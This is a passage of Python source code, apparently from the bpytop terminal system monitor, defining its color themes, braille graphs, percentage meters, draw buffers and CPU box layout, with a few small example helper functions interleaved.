'''Wait for input reader and self to be idle then print to screen'''
Key.idle.wait()
cls.idle.wait()
cls.idle.clear()
try:
print(*args, sep="", end="", flush=True)
except BlockingIOError:
pass
Key.idle.wait()
print(*args, sep="", end="", flush=True)
cls.idle.set()
@classmethod
def buffer(cls, name: str, *args: str, append: bool = False, now: bool = False, z: int = 100, only_save: bool = False, no_save: bool = False, once: bool = False):
string: str = ""
if name.startswith("+"):
name = name.lstrip("+")
append = True
if name.endswith("!"):
name = name.rstrip("!")
now = True
cls.save[name] = not no_save
cls.once[name] = once
if not name in cls.z_order or z != 100: cls.z_order[name] = z
if args: string = "".join(args)
if only_save:
if name not in cls.saved or not append: cls.saved[name] = ""
cls.saved[name] += string
else:
if name not in cls.strings or not append: cls.strings[name] = ""
cls.strings[name] += string
if now:
cls.out(name)
@classmethod
def out(cls, *names: str, clear = False):
out: str = ""
if not cls.strings: return
if names:
for name in sorted(cls.z_order, key=cls.z_order.get, reverse=True): #type: ignore
if name in names and name in cls.strings:
out += cls.strings[name]
if cls.save[name]:
cls.saved[name] = cls.strings[name]
if clear or cls.once[name]:
cls.clear(name)
cls.now(out)
else:
for name in sorted(cls.z_order, key=cls.z_order.get, reverse=True): #type: ignore
if name in cls.strings:
out += cls.strings[name]
if cls.save[name]:
cls.saved[name] = cls.strings[name]
if cls.once[name] and not clear:
cls.clear(name)
if clear:
cls.clear()
cls.now(out)
@classmethod
def saved_buffer(cls) -> str:
out: str = ""
for name in sorted(cls.z_order, key=cls.z_order.get, reverse=True): #type: ignore
if name in cls.saved:
out += cls.saved[name]
return out
@classmethod
def clear(cls, *names, saved: bool = False):
if names:
for name in names:
if name in cls.strings:
del cls.strings[name]
if name in cls.save:
del cls.save[name]
if name in cls.once:
del cls.once[name]
if saved:
if name in cls.saved:
del cls.saved[name]
if name in cls.z_order:
del cls.z_order[name]
else:
cls.strings = {}
cls.save = {}
cls.once = {}
if saved:
cls.saved = {}
cls.z_order = {}
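# Illustrative sketch only, never called: how the buffer API described in the
# Draw docstring is meant to be used. The buffer names "banner" and "status"
# are hypothetical placeholders.
def _example_draw_buffers() -> None:
    Draw.buffer("banner", "some text", z=50)      # queued, drawn on the next out()
    Draw.buffer("+banner", " appended")           # "+" prefix appends instead of replacing
    Draw.buffer("status!", "drawn immediately")   # "!" suffix prints the buffer right away
    Draw.out(clear=True)                          # flush every buffer in z-order, then clear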
class Color:
'''Holds representations for a 24-bit color value
__init__(color, depth="fg", default=False)
-- color accepts 6 digit hexadecimal: string "#RRGGBB", 2 digit hexadecimal: string "#FF" or decimal RGB "255 255 255" as a string.
-- depth accepts "fg" or "bg"
    __call__(*args) joins str arguments to a string and applies color
__str__ returns escape sequence to set color
__iter__ returns iteration over red, green and blue in integer values of 0-255.
* Values: .hexa: str | .dec: Tuple[int, int, int] | .red: int | .green: int | .blue: int | .depth: str | .escape: str
'''
hexa: str; dec: Tuple[int, int, int]; red: int; green: int; blue: int; depth: str; escape: str; default: bool
def __init__(self, color: str, depth: str = "fg", default: bool = False):
self.depth = depth
self.default = default
try:
if not color:
self.dec = (-1, -1, -1)
self.hexa = ""
self.red = self.green = self.blue = -1
self.escape = "\033[49m" if depth == "bg" and default else ""
return
elif color.startswith("#"):
self.hexa = color
if len(self.hexa) == 3:
self.hexa += self.hexa[1:3] + self.hexa[1:3]
c = int(self.hexa[1:3], base=16)
self.dec = (c, c, c)
elif len(self.hexa) == 7:
self.dec = (int(self.hexa[1:3], base=16), int(self.hexa[3:5], base=16), int(self.hexa[5:7], base=16))
else:
raise ValueError(f'Incorrectly formatted hexadecimal rgb string: {self.hexa}')
else:
c_t = tuple(map(int, color.split(" ")))
if len(c_t) == 3:
self.dec = c_t #type: ignore
else:
raise ValueError(f'RGB dec should be "0-255 0-255 0-255"')
ct = self.dec[0] + self.dec[1] + self.dec[2]
if ct > 255*3 or ct < 0:
raise ValueError(f'RGB values out of range: {color}')
except Exception as e:
errlog.exception(str(e))
self.escape = ""
return
if self.dec and not self.hexa: self.hexa = f'{hex(self.dec[0]).lstrip("0x").zfill(2)}{hex(self.dec[1]).lstrip("0x").zfill(2)}{hex(self.dec[2]).lstrip("0x").zfill(2)}'
if self.dec and self.hexa:
self.red, self.green, self.blue = self.dec
self.escape = f'\033[{38 if self.depth == "fg" else 48};2;{";".join(str(c) for c in self.dec)}m'
def __str__(self) -> str:
return self.escape
def __repr__(self) -> str:
return repr(self.escape)
def __iter__(self) -> Iterable:
for c in self.dec: yield c
def __call__(self, *args: str) -> str:
if len(args) < 1: return ""
return f'{self.escape}{"".join(args)}{getattr(Term, self.depth)}'
@staticmethod
def escape_color(hexa: str = "", r: int = 0, g: int = 0, b: int = 0, depth: str = "fg") -> str:
"""Returns escape sequence to set color
* accepts either 6 digit hexadecimal hexa="#RRGGBB", 2 digit hexadecimal: hexa="#FF"
* or decimal RGB: r=0-255, g=0-255, b=0-255
* depth="fg" or "bg"
"""
dint: int = 38 if depth == "fg" else 48
color: str = ""
if hexa:
try:
if len(hexa) == 3:
c = int(hexa[1:], base=16)
color = f'\033[{dint};2;{c};{c};{c}m'
elif len(hexa) == 7:
color = f'\033[{dint};2;{int(hexa[1:3], base=16)};{int(hexa[3:5], base=16)};{int(hexa[5:7], base=16)}m'
except ValueError as e:
errlog.exception(f'{e}')
else:
color = f'\033[{dint};2;{r};{g};{b}m'
return color
@classmethod
def fg(cls, *args) -> str:
if len(args) > 2: return cls.escape_color(r=args[0], g=args[1], b=args[2], depth="fg")
else: return cls.escape_color(hexa=args[0], depth="fg")
@classmethod
def bg(cls, *args) -> str:
if len(args) > 2: return cls.escape_color(r=args[0], g=args[1], b=args[2], depth="bg")
else: return cls.escape_color(hexa=args[0], depth="bg")
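# Illustrative sketch only, never called: the three input forms Color accepts
# and what __call__ does with them. The variable names are hypothetical.
def _example_color_usage() -> None:
    orange = Color("#db8b00")               # 6 digit hex -> dec (219, 139, 0)
    grey_bg = Color("#cc", depth="bg")      # 2 digit hex -> greyscale, as background
    white = Color("255 255 255")            # decimal "R G B" string
    text = orange("warning") + white("ok")  # wraps the args in escape codes and resets to Term fg/bg
    print(repr(grey_bg), len(text))         # __repr__ exposes the raw escape sequence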
class Colors:
'''Standard colors for menus and dialogs'''
default = Color("#cc")
white = Color("#ff")
red = Color("#bf3636")
green = Color("#68bf36")
blue = Color("#0fd7ff")
yellow = Color("#db8b00")
black_bg = Color("#00", depth="bg")
null = Color("")
class Theme:
'''__init__ accepts a dict containing { "color_element" : "color" }'''
themes: Dict[str, str] = {}
cached: Dict[str, Dict[str, str]] = { "Default" : DEFAULT_THEME }
current: str = ""
main_bg = main_fg = title = hi_fg = selected_bg = selected_fg = inactive_fg = proc_misc = cpu_box = mem_box = net_box = proc_box = div_line = temp_start = temp_mid = temp_end = cpu_start = cpu_mid = cpu_end = free_start = free_mid = free_end = cached_start = cached_mid = cached_end = available_start = available_mid = available_end = used_start = used_mid = used_end = download_start = download_mid = download_end = upload_start = upload_mid = upload_end = graph_text = meter_bg = process_start = process_mid = process_end = Colors.default
gradient: Dict[str, List[str]] = {
"temp" : [],
"cpu" : [],
"free" : [],
"cached" : [],
"available" : [],
"used" : [],
"download" : [],
"upload" : [],
"proc" : [],
"proc_color" : [],
"process" : [],
}
def __init__(self, theme: str):
self.refresh()
self._load_theme(theme)
def __call__(self, theme: str):
for k in self.gradient.keys(): self.gradient[k] = []
self._load_theme(theme)
def _load_theme(self, theme: str):
tdict: Dict[str, str]
if theme in self.cached:
tdict = self.cached[theme]
elif theme in self.themes:
tdict = self._load_file(self.themes[theme])
self.cached[theme] = tdict
else:
errlog.warning(f'No theme named "{theme}" found!')
theme = "Default"
CONFIG.color_theme = theme
tdict = DEFAULT_THEME
self.current = theme
#if CONFIG.color_theme != theme: CONFIG.color_theme = theme
if not "graph_text" in tdict and "inactive_fg" in tdict:
tdict["graph_text"] = tdict["inactive_fg"]
if not "meter_bg" in tdict and "inactive_fg" in tdict:
tdict["meter_bg"] = tdict["inactive_fg"]
if not "process_start" in tdict and "cpu_start" in tdict:
tdict["process_start"] = tdict["cpu_start"]
tdict["process_mid"] = tdict.get("cpu_mid", "")
tdict["process_end"] = tdict.get("cpu_end", "")
#* Get key names from DEFAULT_THEME dict to not leave any color unset if missing from theme dict
for item, value in DEFAULT_THEME.items():
default = item in ["main_fg", "main_bg"]
depth = "bg" if item in ["main_bg", "selected_bg"] else "fg"
if item in tdict:
setattr(self, item, Color(tdict[item], depth=depth, default=default))
else:
setattr(self, item, Color(value, depth=depth, default=default))
#* Create color gradients from one, two or three colors, 101 values indexed 0-100
self.proc_start, self.proc_mid, self.proc_end = self.main_fg, Colors.null, self.inactive_fg
self.proc_color_start, self.proc_color_mid, self.proc_color_end = self.inactive_fg, Colors.null, self.process_start
rgb: Dict[str, Tuple[int, int, int]]
colors: List[List[int]] = []
for name in self.gradient:
rgb = { "start" : getattr(self, f'{name}_start').dec, "mid" : getattr(self, f'{name}_mid').dec, "end" : getattr(self, f'{name}_end').dec }
colors = [ list(getattr(self, f'{name}_start')) ]
if rgb["end"][0] >= 0:
r = 50 if rgb["mid"][0] >= 0 else 100
for first, second in ["start", "mid" if r == 50 else "end"], ["mid", "end"]:
for i in range(r):
colors += [[rgb[first][n] + i * (rgb[second][n] - rgb[first][n]) // r for n in range(3)]]
if r == 100:
break
self.gradient[name] += [ Color.fg(*color) for color in colors ]
else:
c = Color.fg(*rgb["start"])
self.gradient[name] += [c] * 101
#* Set terminal colors
Term.fg = f'{self.main_fg}'
Term.bg = f'{self.main_bg}' if CONFIG.theme_background else "\033[49m"
Draw.now(self.main_fg, self.main_bg)
@classmethod
def refresh(cls):
'''Sets themes dict with names and paths to all found themes'''
cls.themes = { "Default" : "Default" }
try:
for d in (THEME_DIR, USER_THEME_DIR):
if not d: continue
for f in os.listdir(d):
if f.endswith(".theme"):
cls.themes[f'{"" if d == THEME_DIR else "+"}{f[:-6]}'] = f'{d}/{f}'
except Exception as e:
errlog.exception(str(e))
@staticmethod
def _load_file(path: str) -> Dict[str, str]:
'''Load a bashtop formatted theme file and return a dict'''
new_theme: Dict[str, str] = {}
try:
with open(path, "r") as f:
for line in f:
if not line.startswith("theme["): continue
key = line[6:line.find("]")]
s = line.find('"')
value = line[s + 1:line.find('"', s + 1)]
new_theme[key] = value
except Exception as e:
errlog.exception(str(e))
return new_theme
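# Illustrative sketch only, never called: the same linear interpolation that
# _load_theme() above uses to expand a start/end color pair into the 101-step
# gradients stored in Theme.gradient (index 0-100 = percent).
def _example_two_color_gradient(start: Tuple[int, int, int], end: Tuple[int, int, int]) -> List[str]:
    steps: List[List[int]] = [list(start)]
    for i in range(100):
        steps.append([start[n] + i * (end[n] - start[n]) // 100 for n in range(3)])
    return [Color.fg(*rgb) for rgb in steps]   # 101 foreground escape sequences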
class Banner:
'''Holds the bpytop banner, .draw(line, [col=0], [center=False], [now=False])'''
out: List[str] = []
c_color: str = ""
length: int = 0
if not out:
for num, (color, color2, line) in enumerate(BANNER_SRC):
if len(line) > length: length = len(line)
out_var = ""
line_color = Color.fg(color)
line_color2 = Color.fg(color2)
line_dark = Color.fg(f'#{80 - num * 6}')
for n, letter in enumerate(line):
if letter == "█" and c_color != line_color:
if 5 < n < 25: c_color = line_color2
else: c_color = line_color
out_var += c_color
elif letter == " ":
letter = f'{Mv.r(1)}'
c_color = ""
elif letter != "█" and c_color != line_dark:
c_color = line_dark
out_var += line_dark
out_var += letter
out.append(out_var)
@classmethod
def draw(cls, line: int, col: int = 0, center: bool = False, now: bool = False):
out: str = ""
if center: col = Term.width // 2 - cls.length // 2
for n, o in enumerate(cls.out):
out += f'{Mv.to(line + n, col)}{o}'
out += f'{Term.fg}'
if now: Draw.out(out)
else: return out
class Symbol:
h_line: str = "─"
v_line: str = "│"
left_up: str = "┌"
right_up: str = "┐"
left_down: str = "└"
right_down: str = "┘"
title_left: str = "┤"
title_right: str = "├"
div_up: str = "┬"
div_down: str = "┴"
graph_up: Dict[float, str] = {
0.0 : " ", 0.1 : "⢀", 0.2 : "⢠", 0.3 : "⢰", 0.4 : "⢸",
1.0 : "⡀", 1.1 : "⣀", 1.2 : "⣠", 1.3 : "⣰", 1.4 : "⣸",
2.0 : "⡄", 2.1 : "⣄", 2.2 : "⣤", 2.3 : "⣴", 2.4 : "⣼",
3.0 : "⡆", 3.1 : "⣆", 3.2 : "⣦", 3.3 : "⣶", 3.4 : "⣾",
4.0 : "⡇", 4.1 : "⣇", 4.2 : "⣧", 4.3 : "⣷", 4.4 : "⣿"
}
graph_up_small = graph_up.copy()
graph_up_small[0.0] = "\033[1C"
graph_down: Dict[float, str] = {
0.0 : " ", 0.1 : "⠈", 0.2 : "⠘", 0.3 : "⠸", 0.4 : "⢸",
1.0 : "⠁", 1.1 : "⠉", 1.2 : "⠙", 1.3 : "⠹", 1.4 : "⢹",
2.0 : "⠃", 2.1 : "⠋", 2.2 : "⠛", 2.3 : "⠻", 2.4 : "⢻",
3.0 : "⠇", 3.1 : "⠏", 3.2 : "⠟", 3.3 : "⠿", 3.4 : "⢿",
4.0 : "⡇", 4.1 : "⡏", 4.2 : "⡟", 4.3 : "⡿", 4.4 : "⣿"
}
graph_down_small = graph_down.copy()
graph_down_small[0.0] = "\033[1C"
meter: str = "■"
up: str = "↑"
down: str = "↓"
left: str = "←"
right: str = "→"
enter: str = "↲"
ok: str = f'{Color.fg("#30ff50")}√{Color.fg("#cc")}'
fail: str = f'{Color.fg("#ff3050")}!{Color.fg("#cc")}'
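# Illustrative sketch only, never called: how Graph._create() below indexes the
# braille tables above. A cell encodes two samples: the left sample (0-4 dots)
# is the integer part of the key and the right sample the decimal, so left=4
# and right=2 give key 4.2 -> "⣧" in graph_up.
def _example_braille_lookup(left: int, right: int, invert: bool = False) -> str:
    table = Symbol.graph_down if invert else Symbol.graph_up
    return table[float(left + right / 10)]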
class Graph:
'''Class for creating and adding to graphs
* __str__ : returns graph as a string
* add(value: int) : adds a value to graph and returns it as a string
* __call__ : same as add
'''
out: str
width: int
height: int
graphs: Dict[bool, List[str]]
colors: List[str]
invert: bool
max_value: int
color_max_value: int
offset: int
current: bool
last: int
symbol: Dict[float, str]
def __init__(self, width: int, height: int, color: Union[List[str], Color, None], data: List[int], invert: bool = False, max_value: int = 0, offset: int = 0, color_max_value: Union[int, None] = None):
self.graphs: Dict[bool, List[str]] = {False : [], True : []}
self.current: bool = True
self.width = width
self.height = height
self.invert = invert
self.offset = offset
if not data: data = [0]
if max_value:
self.max_value = max_value
data = [ min(100, (v + offset) * 100 // (max_value + offset)) for v in data ] #* Convert values to percentage values of max_value with max_value as ceiling
else:
self.max_value = 0
if color_max_value:
self.color_max_value = color_max_value
else:
self.color_max_value = self.max_value
if self.color_max_value and self.max_value:
color_scale = int(100.0 * self.max_value / self.color_max_value)
else:
color_scale = 100
self.colors: List[str] = []
if isinstance(color, list) and height > 1:
for i in range(1, height + 1): self.colors.insert(0, color[min(100, i * color_scale // height)]) #* Calculate colors of graph
if invert: self.colors.reverse()
elif isinstance(color, Color) and height > 1:
self.colors = [ f'{color}' for _ in range(height) ]
else:
if isinstance(color, list): self.colors = color
elif isinstance(color, Color): self.colors = [ f'{color}' for _ in range(101) ]
if self.height == 1:
self.symbol = Symbol.graph_down_small if invert else Symbol.graph_up_small
else:
self.symbol = Symbol.graph_down if invert else Symbol.graph_up
value_width: int = ceil(len(data) / 2)
filler: str = ""
        if value_width > width: #* If the given data set is bigger than the width of the graph, shrink the data set
data = data[-(width*2):]
value_width = ceil(len(data) / 2)
        elif value_width < width: #* If the given data set is smaller than the width of the graph, fill the graph with whitespace
filler = self.symbol[0.0] * (width - value_width)
if len(data) % 2: data.insert(0, 0)
for _ in range(height):
for b in [True, False]:
self.graphs[b].append(filler)
self._create(data, new=True)
def _create(self, data: List[int], new: bool = False):
h_high: int
h_low: int
value: Dict[str, int] = { "left" : 0, "right" : 0 }
val: int
side: str
#* Create the graph
for h in range(self.height):
h_high = round(100 * (self.height - h) / self.height) if self.height > 1 else 100
h_low = round(100 * (self.height - (h + 1)) / self.height) if self.height > 1 else 0
for v in range(len(data)):
if new: self.current = bool(v % 2) #* Switch between True and False graphs
if new and v == 0: self.last = 0
for val, side in [self.last, "left"], [data[v], "right"]: # type: ignore
if val >= h_high:
value[side] = 4
elif val <= h_low:
value[side] = 0
else:
if self.height == 1: value[side] = round(val * 4 / 100 + 0.5)
else: value[side] = round((val - h_low) * 4 / (h_high - h_low) + 0.1)
if new: self.last = data[v]
self.graphs[self.current][h] += self.symbol[float(value["left"] + value["right"] / 10)]
if data: self.last = data[-1]
self.out = ""
if self.height == 1:
self.out += f'{"" if not self.colors else self.colors[self.last]}{self.graphs[self.current][0]}'
elif self.height > 1:
for h in range(self.height):
if h > 0: self.out += f'{Mv.d(1)}{Mv.l(self.width)}'
self.out += f'{"" if not self.colors else self.colors[h]}{self.graphs[self.current][h if not self.invert else (self.height - 1) - h]}'
if self.colors: self.out += f'{Term.fg}'
def __call__(self, value: Union[int, None] = None) -> str:
if not isinstance(value, int): return self.out
self.current = not self.current
if self.height == 1:
if self.graphs[self.current][0].startswith(self.symbol[0.0]):
self.graphs[self.current][0] = self.graphs[self.current][0].replace(self.symbol[0.0], "", 1)
else:
self.graphs[self.current][0] = self.graphs[self.current][0][1:]
else:
for n in range(self.height):
self.graphs[self.current][n] = self.graphs[self.current][n][1:]
if self.max_value: value = (value + self.offset) * 100 // (self.max_value + self.offset) if value < self.max_value else 100
self._create([value])
return self.out
def add(self, value: Union[int, None] = None) -> str:
return self.__call__(value)
def __str__(self):
return self.out
def __repr__(self):
return repr(self.out)
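# Illustrative sketch only, never called: building a one-cell-high braille graph
# and feeding it new samples, as the boxes further down do on every refresh.
# The history values and the buffer name are made up.
def _example_graph_usage() -> None:
    history = [0, 25, 50, 75, 100]
    graph = Graph(20, 1, THEME.gradient["cpu"], history)   # width=20 cells, height=1
    frame = graph(42)                # push a new value and get the redrawn graph string
    Draw.buffer("example_graph!", frame)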
class Graphs:
'''Holds all graphs and lists of graphs for dynamically created graphs'''
cpu: Dict[str, Graph] = {}
cores: List[Graph] = [NotImplemented] * THREADS
temps: List[Graph] = [NotImplemented] * (THREADS + 1)
net: Dict[str, Graph] = {}
detailed_cpu: Graph = NotImplemented
detailed_mem: Graph = NotImplemented
pid_cpu: Dict[int, Graph] = {}
class Meter:
'''Creates a percentage meter
__init__(value, width, theme, gradient_name) to create new meter
__call__(value) to set value and return meter as a string
__str__ returns last set meter as a string
'''
out: str
color_gradient: List[str]
color_inactive: Color
gradient_name: str
width: int
invert: bool
saved: Dict[int, str]
def __init__(self, value: int, width: int, gradient_name: str, invert: bool = False):
self.gradient_name = gradient_name
self.color_gradient = THEME.gradient[gradient_name]
self.color_inactive = THEME.meter_bg
self.width = width
self.saved = {}
self.invert = invert
self.out = self._create(value)
def __call__(self, value: Union[int, None]) -> str:
if not isinstance(value, int): return self.out
if value > 100: value = 100
        elif value < 0: value = 0
if value in self.saved:
self.out = self.saved[value]
else:
self.out = self._create(value)
return self.out
def __str__(self) -> str:
return self.out
def __repr__(self):
return repr(self.out)
def _create(self, value: int) -> str:
if value > 100: value = 100
        elif value < 0: value = 0
out: str = ""
for i in range(1, self.width + 1):
if value >= round(i * 100 / self.width):
out += f'{self.color_gradient[round(i * 100 / self.width) if not self.invert else round(100 - (i * 100 / self.width))]}{Symbol.meter}'
else:
out += self.color_inactive(Symbol.meter * (self.width + 1 - i))
break
else:
out += f'{Term.fg}'
if not value in self.saved:
self.saved[value] = out
return out
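# Illustrative sketch only, never called: a Meter is created once per box and
# then re-rendered by calling it with a new percentage; results are cached in
# .saved so repeated values cost nothing. "cpu" is one of the gradient names
# defined in Theme.gradient.
def _example_meter_usage() -> None:
    meter = Meter(0, 20, "cpu")      # start value 0, width 20 cells, cpu gradient
    for percent in (10, 55, 100, 55):
        rendered = meter(percent)    # the second 55 comes straight from meter.saved
    print(len(meter.saved))          # 4 cached renders: 0, 10, 55 and 100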
class Meters:
cpu: Meter
battery: Meter
mem: Dict[str, Union[Meter, Graph]] = {}
swap: Dict[str, Union[Meter, Graph]] = {}
disks_used: Dict[str, Meter] = {}
disks_free: Dict[str, Meter] = {}
class Box:
'''Box class with all needed attributes for create_box() function'''
name: str
num: int = 0
boxes: List = []
view_modes: Dict[str, List] = {"full" : ["cpu", "mem", "net", "proc"], "stat" : ["cpu", "mem", "net"], "proc" : ["cpu", "proc"]}
view_mode: str
for view_mode in view_modes:
if sorted(CONFIG.shown_boxes.split(), key=str.lower) == view_modes[view_mode]:
break
else:
view_mode = "user"
view_modes["user"] = CONFIG.shown_boxes.split()
height_p: int
width_p: int
x: int
y: int
width: int
height: int
out: str
bg: str
_b_cpu_h: int
_b_mem_h: int
redraw_all: bool
buffers: List[str] = []
clock_on: bool = False
clock: str = ""
clock_len: int = 0
resized: bool = False
clock_custom_format: Dict[str, Any] = {
"/host" : os.uname()[1],
"/user" : os.environ.get("USER") or pwd.getpwuid(os.getuid())[0],
}
if clock_custom_format["/host"].endswith(".local"):
clock_custom_format["/host"] = clock_custom_format["/host"].replace(".local", "")
@classmethod
def calc_sizes(cls):
'''Calculate sizes of boxes'''
cls.boxes = CONFIG.shown_boxes.split()
for sub in cls.__subclasses__():
sub._calc_size() # type: ignore
sub.resized = True # type: ignore
@classmethod
def draw_update_ms(cls, now: bool = True):
if not "cpu" in cls.boxes: return
update_string: str = f'{CONFIG.update_ms}ms'
xpos: int = CpuBox.x + CpuBox.width - len(update_string) - 15
if not "+" in Key.mouse:
Key.mouse["+"] = [[xpos + 7 + i, CpuBox.y] for i in range(3)]
Key.mouse["-"] = [[CpuBox.x + CpuBox.width - 4 + i, CpuBox.y] for i in range(3)]
Draw.buffer("update_ms!" if now and not Menu.active else "update_ms",
f'{Mv.to(CpuBox.y, xpos)}{THEME.cpu_box(Symbol.h_line * 7, Symbol.title_left)}{Fx.b}{THEME.hi_fg("+")} ',
f'{THEME.title(update_string)} {THEME.hi_fg("-")}{Fx.ub}{THEME.cpu_box(Symbol.title_right)}', only_save=Menu.active, once=True)
if now and not Menu.active:
Draw.clear("update_ms")
if CONFIG.show_battery and hasattr(psutil, "sensors_battery") and psutil.sensors_battery():
Draw.out("battery")
@classmethod
def draw_clock(cls, force: bool = False):
if not "cpu" in cls.boxes or not cls.clock_on: return
out: str = ""
if force: pass
elif Term.resized or strftime(CONFIG.draw_clock) == cls.clock: return
clock_string = cls.clock = strftime(CONFIG.draw_clock)
for custom in cls.clock_custom_format:
if custom in clock_string:
clock_string = clock_string.replace(custom, cls.clock_custom_format[custom])
clock_len = len(clock_string[:(CpuBox.width-56)])
if cls.clock_len != clock_len and not CpuBox.resized:
out = f'{Mv.to(CpuBox.y, ((CpuBox.width)//2)-(cls.clock_len//2))}{Fx.ub}{THEME.cpu_box}{Symbol.h_line * cls.clock_len}'
cls.clock_len = clock_len
now: bool = False if Menu.active else not force
out += (f'{Mv.to(CpuBox.y, ((CpuBox.width)//2)-(clock_len//2))}{Fx.ub}{THEME.cpu_box}'
f'{Symbol.title_left}{Fx.b}{THEME.title(clock_string[:clock_len])}{Fx.ub}{THEME.cpu_box}{Symbol.title_right}{Term.fg}')
Draw.buffer("clock", out, z=1, now=now, once=not force, only_save=Menu.active)
if now and not Menu.active:
if CONFIG.show_battery and hasattr(psutil, "sensors_battery") and psutil.sensors_battery():
Draw.out("battery")
@classmethod
def empty_bg(cls) -> str:
return (f'{Term.clear}{Banner.draw(Term.height // 2 - 10, center=True)}'
f'{Mv.d(1)}{Mv.l(46)}{Colors.black_bg}{Colors.default}{Fx.b}[esc] Menu'
f'{Mv.r(25)}{Fx.i}Version: {VERSION}{Fx.ui}'
f'{Mv.d(1)}{Mv.l(34)}{Fx.b}All boxes hidden!'
f'{Mv.d(1)}{Mv.l(17)}{Fx.b}[1] {Fx.ub}Toggle CPU box'
f'{Mv.d(1)}{Mv.l(18)}{Fx.b}[2] {Fx.ub}Toggle MEM box'
f'{Mv.d(1)}{Mv.l(18)}{Fx.b}[3] {Fx.ub}Toggle NET box'
f'{Mv.d(1)}{Mv.l(18)}{Fx.b}[4] {Fx.ub}Toggle PROC box'
f'{Mv.d(1)}{Mv.l(19)}{Fx.b}[m] {Fx.ub}Cycle presets'
f'{Mv.d(1)}{Mv.l(17)}{Fx.b}[q] Quit {Fx.ub}{Term.bg}{Term.fg}')
@classmethod
def draw_bg(cls, now: bool = True):
'''Draw all boxes outlines and titles'''
out: str = ""
if not cls.boxes:
out = cls.empty_bg()
else:
out = "".join(sub._draw_bg() for sub in cls.__subclasses__()) # type: ignore
Draw.buffer("bg", out, now=now, z=1000, only_save=Menu.active, once=True)
cls.draw_update_ms(now=now)
if CONFIG.draw_clock: cls.draw_clock(force=True)
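# Illustrative sketch only, never called: how the view_modes table above maps a
# shown_boxes config string onto a named preset, using the same sorted-list
# comparison that runs at class creation time. The argument is hypothetical.
def _example_view_mode_for(shown_boxes: str) -> str:
    boxes = sorted(shown_boxes.split(), key=str.lower)
    for mode, layout in Box.view_modes.items():
        if boxes == layout:
            return mode              # "full", "stat" or "proc"
    return "user"                    # anything else becomes a custom "user" preset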
class SubBox:
box_x: int = 0
box_y: int = 0
box_width: int = 0
box_height: int = 0
box_columns: int = 0
column_size: int = 0
class CpuBox(Box, SubBox):
name = "cpu"
num = 1
x = 1
y = 1
height_p = 32
width_p = 100
resized: bool = True
redraw: bool = False
buffer: str = "cpu"
battery_percent: int = 1000
battery_secs: int = 0
battery_status: str = "Unknown"
old_battery_pos = 0
old_battery_len = 0
battery_path: Union[str, None] = ""
battery_clear: bool = False
battery_symbols: Dict[str, str] = {"Charging": "▲",
"Discharging": "▼",
"Full": "■",
"Not charging": "■"}
clock_block: bool = True
Box.buffers.append(buffer)
@classmethod
def _calc_size(cls):
if not "cpu" in cls.boxes:
Box._b_cpu_h = 0
cls.width = Term.width
return
cpu = CpuCollector
height_p: int
if cls.boxes == ["cpu"]:
height_p = 100
else:
height_p = cls.height_p
cls.width = round(Term.width * cls.width_p / 100)
cls.height = round(Term.height * height_p / 100)
if cls.height < 8: cls.height = 8
Box._b_cpu_h = cls.height
#THREADS = 64
cls.box_columns = ceil((THREADS + 1) / (cls.height - 5))
if cls.box_columns * (20 + 13 if cpu.got_sensors else 21) < cls.width - (cls.width // 3):
cls.column_size = 2
cls.box_width = (20 + 13 if cpu.got_sensors else 21) * cls.box_columns - ((cls.box_columns - 1) * 1)
elif cls.box_columns * (15 + 6 if cpu.got_sensors else 15) < cls.width - (cls.width // 3):
cls.column_size = 1
cls.box_width = (15 + 6 if cpu.got_sensors else 15) * cls.box_columns - ((cls.box_columns - 1) * 1)
elif cls.box_columns * (8 + 6 if cpu.got_sensors else 8) < cls.width - (cls.width // 3):
cls.column_size = 0
else:
cls.box_columns = (cls.width - cls.width // 3) // (8 + 6 if cpu.got_sensors else 8); cls.column_size = 0
if cls.column_size == 0: cls.box_width = (8 + 6 if cpu.got_sensors else 8) * cls.box_columns + 1
cls.box_height = ceil(THREADS / cls.box_columns) + 4
if cls.box_height > cls.height - 2: cls.box_height = cls.height - 2
cls.box_x = (cls.width - 1) - cls.box_width
cls.box_y = cls.y + ceil((cls.height - 2) / 2) - ceil(cls.box_height / 2) + 1
@classmethod
def _draw_bg(cls) -> str:
if not "cpu" in cls.boxes: return ""
if not "M" in Key.mouse:
Key.mouse["M"] = [[cls.x + 10 + i, cls.y] for i in range(6)]
return (f'{create_box(box=cls, line_color=THEME.cpu_box)}'
f'{Mv.to(cls.y, cls.x + 10)}{THEME.cpu_box(Symbol.title_left)}{Fx.b}{THEME.hi_fg("M")}{THEME.title("enu")}{Fx.ub}{THEME.cpu_box(Symbol.title_right)}'
f'{create_box(x=cls.box_x, y=cls.box_y, width=cls.box_width, height=cls.box_height, line_color=THEME.div_line, fill=False, title=CPU_NAME[:cls.box_width - 14] if not CONFIG.custom_cpu_name else CONFIG.custom_cpu_name[:cls.box_width - 14])}')
@classmethod
def battery_activity(cls) -> bool:
if not hasattr(psutil, "sensors_battery") or psutil.sensors_battery() == None:
if cls.battery_percent != 1000:
cls.battery_clear = True
return False
if cls.battery_path == "":
cls.battery_path = None
if os.path.isdir("/sys/class/power_supply"):
for directory in sorted(os.listdir("/sys/class/power_supply")):
if directory.startswith('BAT') or 'battery' in directory.lower():
cls.battery_path = f'/sys/class/power_supply/{directory}/'
break
return_true: bool = False
percent: int = ceil(getattr(psutil.sensors_battery(), "percent", 0))
if percent != cls.battery_percent:
cls.battery_percent = percent
return_true = True
seconds: int = getattr(psutil.sensors_battery(), "secsleft", 0)
if seconds != cls.battery_secs:
cls.battery_secs = seconds
return_true = True
status: str = "not_set"
if cls.battery_path:
status = readfile(cls.battery_path + "status", default="not_set")
if status == "not_set" and getattr(psutil.sensors_battery(), "power_plugged", None) == True:
status = "Charging" if cls.battery_percent < 100 else "Full"
elif status == "not_set" and getattr(psutil.sensors_battery(), "power_plugged", None) == False:
status = "Discharging"
elif status == "not_set":
status = "Unknown"
if status != cls.battery_status:
cls.battery_status = status
return_true = True
return return_true or cls.resized or cls.redraw or Menu.active
@classmethod
def _draw_fg(cls):
if not "cpu" in cls.boxes: return
cpu = CpuCollector
if cpu.redraw: cls.redraw = True
out: str = ""
out_misc: str = ""
lavg: str = ""
x, y, w, h = cls.x + 1, cls.y + 1, cls.width - 2, cls.height - 2
bx, by, bw, bh = cls.box_x + 1, cls.box_y + 1, cls.box_width - 2, cls.box_height - 2
hh: int = ceil(h / 2)
hide_cores: bool = (cpu.cpu_temp_only or not CONFIG.show_coretemp) and cpu.got_sensors
ct_width: int = (max(6, 6 * cls.column_size)) * hide_cores
if cls.resized or cls.redraw:
if not "m" in Key.mouse:
